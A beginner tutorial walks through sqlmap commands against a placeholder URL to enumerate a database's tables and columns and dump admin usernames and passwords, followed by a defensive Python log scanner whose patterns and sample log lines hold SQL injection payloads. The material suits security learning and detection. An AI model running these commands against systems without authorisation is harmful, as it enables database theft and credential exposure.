SQL Injection through SQLMAP
Hello guys, today I am going to show you a major vulnerability in web applications. There are many types of injection, and SQL injection is one of them. SQL injection is a vast topic, so keep learning; I am still a learner too. Without wasting any time, let's come to the point.
SQL injection is a type of vulnerability in which an attacker can execute some code and expose the backend database; in simple words, an attacker can dump your database.
sqlmap is an open source command-line tool used for exploiting SQL injection vulnerabilities.
If you are using Windows you can download sqlmap here; Kali, however, has sqlmap built in.
Let's start the practical.
- Launch SQLMAP
Now type the following command in the terminal:
- python sqlmap.py -u "http://yourtargetaddress.com/?id=1" --current-db
- sqlmap has now started. It will take a couple of seconds to enumerate the database.
- Now we have the database name, as you can see in the image above. Our next step is to enumerate the tables.
- Type the following command to enumerate the tables. Follow me step by step. 🙂
python sqlmap.py -u "http://yourtargetaddress.com/?id=1" -D database_name --tables
As you can see in the image below, we have successfully enumerated the table names.
In the image above you can see that sqlmap enumerated the table names; now we have to find the columns. Here I am finding the columns for admin.
python sqlmap.py -u "http://yourtargetaddress.com/?id=1" -D database_name -T table_name --columns
Again, sqlmap is enumerating the column names from the table admin.
Cool, guys, we have successfully enumerated the column names. Now our next step is to dump/enumerate the username and password.
Follow me and use this command:
python sqlmap.py -u "http://yourtargetaddress.com/?id=1" -D database_name -T table_name -C column_name --dump
sqlmap started enumerating the database; as you can see, the database is enumerated.
Yeah, we got the username and password. 🙂 Keep learning and practising, but don't harm any site.
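Every step above is an HTTP request to the id parameter, so it shows up in the web server's access log. The following is an added example, not part of the original post: it scans Combined Log Format lines for requests whose id value is not a plain integer or whose User-Agent names sqlmap. The log lines, the function names and the assumption that id is always numeric are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Tokens that have no business inside a numeric id (first-pass list, not exhaustive).
SQL_TOKENS = re.compile(r"(?i)\b(union|select|information_schema|sleep|concat)\b|--|/\*|'")

# Constructed sample lines; addresses come from the documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2024:10:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2024:10:00:02 +0000] "GET /?id=1%27%20AND%201%3D1--%20 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
203.0.113.9 - - [10/Mar/2024:10:00:03 +0000] "GET /?id=1%20UNION%20SELECT%20NULL HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:10:00:04 +0000] "GET /?id=42 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""

def classify(line):
    """Return (client_ip, reasons); reasons is empty for a normal request."""
    m = LOG_RE.match(line)
    if m is None:
        return None, ["unparseable"]
    reasons = []
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap-user-agent")
    # parse_qs percent-decodes the value, so encoded payloads are inspected in clear.
    query = urlsplit(m["target"]).query
    for value in parse_qs(query, keep_blank_values=True).get("id", []):
        if not re.fullmatch(r"[0-9]{1,10}", value):  # assumption: id is an integer
            reasons.append("non-numeric-id")
        if SQL_TOKENS.search(value):
            reasons.append("sql-token-in-id")
    return m["ip"], reasons

def flagged_by_ip(log_text):
    """Count suspicious requests per client address."""
    hits = Counter()
    for line in log_text.splitlines():
        ip, reasons = classify(line)
        if ip and reasons:
            hits[ip] += 1
    return hits

if __name__ == "__main__":
    for ip, count in flagged_by_ip(SAMPLE_LOG).most_common():
        print(ip, count)
```

The User-Agent header is set by the client, so treat that match as a hint only; the non-numeric id check is the stronger signal, and the same integer check belongs in the application before the value reaches a query.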